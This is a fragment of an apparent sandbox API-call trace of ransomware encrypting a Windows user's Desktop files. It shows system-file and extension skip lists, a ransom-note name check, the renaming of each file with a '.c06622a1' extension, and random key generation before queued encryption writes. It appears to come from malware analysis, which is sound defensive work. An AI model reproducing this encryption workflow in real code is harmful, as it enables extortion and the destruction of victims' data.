(_String="rom") returned 0x3 [0148.351] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0148.351] wcslen (_String="rtp") returned 0x3 [0148.351] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0148.351] wcslen (_String="scr") returned 0x3 [0148.351] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0148.351] wcslen (_String="shs") returned 0x3 [0148.351] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0148.351] wcslen (_String="spl") returned 0x3 [0148.351] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0148.351] wcslen (_String="sys") returned 0x3 [0148.351] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0148.351] wcslen (_String="theme") returned 0x5 [0148.351] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0148.351] wcslen (_String="themepack") returned 0x9 [0148.351] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0148.351] wcslen (_String="wpx") returned 0x3 [0148.351] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0148.351] wcslen (_String="lock") returned 0x4 [0148.351] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0148.351] wcslen (_String="key") returned 0x3 [0148.351] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0148.351] wcslen (_String="hta") returned 0x3 [0148.351] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0148.351] wcslen (_String="msi") returned 0x3 [0148.351] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0148.351] wcslen (_String="pdb") returned 0x3 [0148.352] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0148.352] wcslen (_String="sql") returned 0x3 [0148.352] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0148.352] wcslen (_String="sqlite") returned 0x6 [0148.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.352] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.352] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.352] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.352] wcscpy (in: _Dest=0x44d00cc, _Source="M9ZilojdIfYHk5ZHoL8Q.m4a" | out: _Dest="M9ZilojdIfYHk5ZHoL8Q.m4a") returned="M9ZilojdIfYHk5ZHoL8Q.m4a" [0148.352] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a", dwFileAttributes=0x80) returned 1 [0148.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m9zilojdifyhk5zhol8q.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0148.352] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.352] ReadFile (in: hFile=0x620, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.353] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x132468d8 [0148.353] RtlComputeCrc32 (PartialCrc=0x68d8, Buffer=0x3feb74, Length=0x80) returned 0xbabd7516 [0148.353] RtlComputeCrc32 (PartialCrc=0x7516, Buffer=0x3feb74, Length=0x80) returned 0x2b2c58b6 [0148.353] RtlComputeCrc32 (PartialCrc=0x58b6, Buffer=0x3feb74, Length=0x80) returned 0xd7c00653 [0148.353] RtlComputeCrc32 (PartialCrc=0x653, Buffer=0x3feb74, Length=0x80) returned 0x838b7727 [0148.353] CloseHandle (hObject=0x620) returned 1 [0148.353] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.353] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a" [0148.353] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a") returned 0x42 [0148.353] wcscpy (in: _Dest=0x44e0104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.353] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m9zilojdifyhk5zhol8q.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m9zilojdifyhk5zhol8q.m4a.c06622a1"), dwFlags=0x8) returned 1 [0148.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M9ZilojdIfYHk5ZHoL8Q.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m9zilojdifyhk5zhol8q.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0148.356] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.356] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x711699df [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28ee5171 [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6013780c [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x564c056a [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x441f73d8 [0148.361] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4094682b [0148.362] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40880fb4 [0148.362] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2a2a4b38 [0148.365] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0xec7e25d5 [0148.365] RtlComputeCrc32 (PartialCrc=0x25d5, Buffer=0x4a60094, Length=0x80) returned 0xa2e21049 [0148.365] RtlComputeCrc32 (PartialCrc=0x1049, Buffer=0x4a60094, Length=0x80) returned 0xc49ff1af [0148.365] RtlComputeCrc32 (PartialCrc=0xf1af, Buffer=0x4a60094, Length=0x80) returned 0xcb935acb [0148.365] RtlComputeCrc32 (PartialCrc=0x5acb, Buffer=0x4a60094, Length=0x80) returned 0xc6d64960 [0148.365] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0148.365] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.365] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.365] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2e5fb20, ftCreationTime.dwHighDateTime=0x1d5dd79, ftLastAccessTime.dwLowDateTime=0xf36c3500, ftLastAccessTime.dwHighDateTime=0x1d5e7a6, ftLastWriteTime.dwLowDateTime=0xf36c3500, ftLastWriteTime.dwHighDateTime=0x1d5e7a6, nFileSizeHigh=0x0, nFileSizeLow=0x125c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mgxos.csv", cAlternateFileName="")) returned 1 [0148.365] _wcsicmp (_Str1="Mgxos.csv", _Str2="README.c06622a1.TXT") returned -5 [0148.365] wcsstr (_Str="Mgxos.csv", _SubStr="README") returned 0x0 [0148.365] _wcsicmp (_Str1="autorun.inf", _Str2="Mgxos.csv") returned -12 [0148.365] wcslen (_String="autorun.inf") returned 0xb [0148.365] _wcsicmp (_Str1="boot.ini", _Str2="Mgxos.csv") returned -11 [0148.365] wcslen (_String="boot.ini") returned 0x8 [0148.365] _wcsicmp (_Str1="bootfont.bin", _Str2="Mgxos.csv") returned -11 [0148.365] wcslen (_String="bootfont.bin") returned 0xc [0148.365] _wcsicmp (_Str1="bootsect.bak", _Str2="Mgxos.csv") returned -11 [0148.365] wcslen (_String="bootsect.bak") returned 0xc [0148.365] _wcsicmp (_Str1="desktop.ini", _Str2="Mgxos.csv") returned -9 [0148.365] wcslen (_String="desktop.ini") returned 0xb [0148.365] _wcsicmp (_Str1="iconcache.db", _Str2="Mgxos.csv") returned -4 [0148.365] wcslen (_String="iconcache.db") returned 0xc [0148.365] _wcsicmp (_Str1="ntldr", _Str2="Mgxos.csv") returned 1 [0148.365] wcslen (_String="ntldr") returned 0x5 [0148.365] _wcsicmp (_Str1="ntuser.dat", _Str2="Mgxos.csv") returned 1 [0148.365] wcslen (_String="ntuser.dat") returned 0xa [0148.365] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Mgxos.csv") returned 1 [0148.365] wcslen (_String="ntuser.dat.log") returned 0xe [0148.365] _wcsicmp (_Str1="ntuser.ini", _Str2="Mgxos.csv") returned 1 [0148.365] wcslen (_String="ntuser.ini") returned 0xa [0148.365] _wcsicmp (_Str1="thumbs.db", _Str2="Mgxos.csv") returned 7 [0148.366] wcslen (_String="thumbs.db") returned 0x9 [0148.366] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0148.366] wcslen (_String="386") returned 0x3 [0148.366] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0148.366] wcslen (_String="adv") returned 0x3 [0148.366] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0148.366] wcslen (_String="ani") returned 0x3 [0148.366] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0148.366] wcslen (_String="bat") returned 0x3 [0148.366] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0148.366] wcslen (_String="bin") returned 0x3 [0148.366] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0148.366] wcslen (_String="cab") returned 0x3 [0148.366] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0148.366] wcslen (_String="cmd") returned 0x3 [0148.366] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0148.366] wcslen (_String="com") returned 0x3 [0148.366] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0148.366] wcslen (_String="cpl") returned 0x3 [0148.366] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0148.366] wcslen (_String="cur") returned 0x3 [0148.366] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0148.366] wcslen (_String="deskthemepack") returned 0xd [0148.366] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0148.366] wcslen (_String="diagcab") returned 0x7 [0148.366] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0148.366] wcslen (_String="diagcfg") returned 0x7 [0148.366] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0148.366] wcslen (_String="diagpkg") returned 0x7 [0148.366] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0148.366] wcslen (_String="dll") returned 0x3 [0148.366] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0148.366] wcslen (_String="drv") returned 0x3 [0148.366] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0148.366] wcslen (_String="exe") returned 0x3 [0148.366] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0148.366] wcslen (_String="hlp") returned 0x3 [0148.367] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0148.367] wcslen (_String="icl") returned 0x3 [0148.367] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0148.367] wcslen (_String="icns") returned 0x4 [0148.367] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0148.367] wcslen (_String="ico") returned 0x3 [0148.367] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0148.367] wcslen (_String="ics") returned 0x3 [0148.367] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0148.367] wcslen (_String="idx") returned 0x3 [0148.367] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0148.367] wcslen (_String="ldf") returned 0x3 [0148.367] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0148.367] wcslen (_String="lnk") returned 0x3 [0148.367] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0148.367] wcslen (_String="mod") returned 0x3 [0148.367] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0148.367] wcslen (_String="mpa") returned 0x3 [0148.367] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0148.367] wcslen (_String="msc") returned 0x3 [0148.367] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0148.367] wcslen (_String="msp") returned 0x3 [0148.367] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0148.367] wcslen (_String="msstyles") returned 0x8 [0148.367] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0148.367] wcslen (_String="msu") returned 0x3 [0148.367] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0148.367] wcslen (_String="nls") returned 0x3 [0148.367] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0148.367] wcslen (_String="nomedia") returned 0x7 [0148.367] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0148.367] wcslen (_String="ocx") returned 0x3 [0148.367] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0148.367] wcslen (_String="prf") returned 0x3 [0148.367] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0148.367] wcslen (_String="ps1") returned 0x3 [0148.368] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0148.368] wcslen (_String="rom") returned 0x3 [0148.368] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0148.368] wcslen (_String="rtp") returned 0x3 [0148.368] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0148.368] wcslen (_String="scr") returned 0x3 [0148.368] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0148.368] wcslen (_String="shs") returned 0x3 [0148.368] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0148.368] wcslen (_String="spl") returned 0x3 [0148.368] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0148.368] wcslen (_String="sys") returned 0x3 [0148.368] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0148.368] wcslen (_String="theme") returned 0x5 [0148.368] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0148.368] wcslen (_String="themepack") returned 0x9 [0148.368] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0148.368] wcslen (_String="wpx") returned 0x3 [0148.368] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0148.368] wcslen (_String="lock") returned 0x4 [0148.368] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0148.368] wcslen (_String="key") returned 0x3 [0148.368] _wcsicmp (_Str1="hta", _Str2="csv") returned 5 [0148.368] wcslen (_String="hta") returned 0x3 [0148.368] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0148.368] wcslen (_String="msi") returned 0x3 [0148.368] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0148.368] wcslen (_String="pdb") returned 0x3 [0148.368] _wcsicmp (_Str1="sql", _Str2="csv") returned 16 [0148.368] wcslen (_String="sql") returned 0x3 [0148.368] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0148.368] wcslen (_String="sqlite") returned 0x6 [0148.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.368] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.369] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.369] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.369] wcscpy (in: _Dest=0x44d00cc, _Source="Mgxos.csv" | out: _Dest="Mgxos.csv") returned="Mgxos.csv" [0148.369] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv", dwFileAttributes=0x80) returned 1 [0148.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgxos.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64c [0148.369] SetFilePointerEx (in: hFile=0x64c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.369] ReadFile (in: hFile=0x64c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.370] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xcf2840ee [0148.370] RtlComputeCrc32 (PartialCrc=0x40ee, Buffer=0x3feb74, Length=0x80) returned 0x5ca0e23f [0148.370] RtlComputeCrc32 (PartialCrc=0xe23f, Buffer=0x3feb74, Length=0x80) returned 0x36478040 [0148.370] RtlComputeCrc32 (PartialCrc=0x8040, Buffer=0x3feb74, Length=0x80) returned 0x416347a [0148.370] RtlComputeCrc32 (PartialCrc=0x347a, Buffer=0x3feb74, Length=0x80) returned 0x13943037 [0148.370] CloseHandle (hObject=0x64c) returned 1 [0148.370] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.370] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv" [0148.370] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv") returned 0x33 [0148.370] wcscpy (in: _Dest=0x44e00e6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.370] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgxos.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgxos.csv.c06622a1"), dwFlags=0x8) returned 1 [0148.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgxos.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgxos.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x64c [0148.384] CreateIoCompletionPort (FileHandle=0x64c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.385] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51763654 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ea79e43 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ad4c7f5 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71bb2367 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x498207ae [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x209a1e1b [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x351e43b3 [0148.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x42458e6 [0148.393] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0xda1acf [0148.393] RtlComputeCrc32 (PartialCrc=0x1acf, Buffer=0x4af0094, Length=0x80) returned 0xb6d2d48f [0148.394] RtlComputeCrc32 (PartialCrc=0xd48f, Buffer=0x4af0094, Length=0x80) returned 0x6a534e9c [0148.394] RtlComputeCrc32 (PartialCrc=0x4e9c, Buffer=0x4af0094, Length=0x80) returned 0x8ed75870 [0148.394] RtlComputeCrc32 (PartialCrc=0x5870, Buffer=0x4af0094, Length=0x80) returned 0x850d281e [0148.394] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0148.394] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.394] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.394] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdac0500, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0xbe72fcb0, ftLastAccessTime.dwHighDateTime=0x1d5db6e, ftLastWriteTime.dwLowDateTime=0xbe72fcb0, ftLastWriteTime.dwHighDateTime=0x1d5db6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NFtp.flv", cAlternateFileName="")) returned 1 [0148.394] _wcsicmp (_Str1="NFtp.flv", _Str2="README.c06622a1.TXT") returned -4 [0148.394] wcsstr (_Str="NFtp.flv", _SubStr="README") returned 0x0 [0148.394] _wcsicmp (_Str1="autorun.inf", _Str2="NFtp.flv") returned -13 [0148.394] wcslen (_String="autorun.inf") returned 0xb [0148.394] _wcsicmp (_Str1="boot.ini", _Str2="NFtp.flv") returned -12 [0148.394] wcslen (_String="boot.ini") returned 0x8 [0148.394] _wcsicmp (_Str1="bootfont.bin", _Str2="NFtp.flv") returned -12 [0148.394] wcslen (_String="bootfont.bin") returned 0xc [0148.394] _wcsicmp (_Str1="bootsect.bak", _Str2="NFtp.flv") returned -12 [0148.394] wcslen (_String="bootsect.bak") returned 0xc [0148.394] _wcsicmp (_Str1="desktop.ini", _Str2="NFtp.flv") returned -10 [0148.394] wcslen (_String="desktop.ini") returned 0xb [0148.394] _wcsicmp (_Str1="iconcache.db", _Str2="NFtp.flv") returned -5 [0148.394] wcslen (_String="iconcache.db") returned 0xc [0148.394] _wcsicmp (_Str1="ntldr", _Str2="NFtp.flv") returned 14 [0148.394] wcslen (_String="ntldr") returned 0x5 [0148.394] _wcsicmp (_Str1="ntuser.dat", _Str2="NFtp.flv") returned 14 [0148.394] wcslen (_String="ntuser.dat") returned 0xa [0148.394] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NFtp.flv") returned 14 [0148.394] wcslen (_String="ntuser.dat.log") returned 0xe [0148.394] _wcsicmp (_Str1="ntuser.ini", _Str2="NFtp.flv") returned 14 [0148.394] wcslen (_String="ntuser.ini") returned 0xa [0148.394] _wcsicmp (_Str1="thumbs.db", _Str2="NFtp.flv") returned 6 [0148.395] wcslen (_String="thumbs.db") returned 0x9 [0148.395] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0148.395] wcslen (_String="386") returned 0x3 [0148.395] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0148.395] wcslen (_String="adv") returned 0x3 [0148.395] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0148.395] wcslen (_String="ani") returned 0x3 [0148.395] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0148.395] wcslen (_String="bat") returned 0x3 [0148.395] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0148.395] wcslen (_String="bin") returned 0x3 [0148.395] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0148.395] wcslen (_String="cab") returned 0x3 [0148.395] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0148.395] wcslen (_String="cmd") returned 0x3 [0148.395] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0148.395] wcslen (_String="com") returned 0x3 [0148.395] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0148.395] wcslen (_String="cpl") returned 0x3 [0148.395] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0148.395] wcslen (_String="cur") returned 0x3 [0148.395] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0148.395] wcslen (_String="deskthemepack") returned 0xd [0148.395] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0148.395] wcslen (_String="diagcab") returned 0x7 [0148.395] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0148.395] wcslen (_String="diagcfg") returned 0x7 [0148.395] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0148.395] wcslen (_String="diagpkg") returned 0x7 [0148.395] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0148.395] wcslen (_String="dll") returned 0x3 [0148.395] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0148.395] wcslen (_String="drv") returned 0x3 [0148.396] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0148.396] wcslen (_String="exe") returned 0x3 [0148.396] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0148.396] wcslen (_String="hlp") returned 0x3 [0148.396] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0148.396] wcslen (_String="icl") returned 0x3 [0148.396] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0148.396] wcslen (_String="icns") returned 0x4 [0148.396] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0148.396] wcslen (_String="ico") returned 0x3 [0148.396] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0148.396] wcslen (_String="ics") returned 0x3 [0148.396] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0148.396] wcslen (_String="idx") returned 0x3 [0148.396] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0148.396] wcslen (_String="ldf") returned 0x3 [0148.396] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0148.396] wcslen (_String="lnk") returned 0x3 [0148.396] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0148.396] wcslen (_String="mod") returned 0x3 [0148.396] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0148.396] wcslen (_String="mpa") returned 0x3 [0148.396] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0148.396] wcslen (_String="msc") returned 0x3 [0148.396] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0148.396] wcslen (_String="msp") returned 0x3 [0148.396] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0148.396] wcslen (_String="msstyles") returned 0x8 [0148.396] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0148.396] wcslen 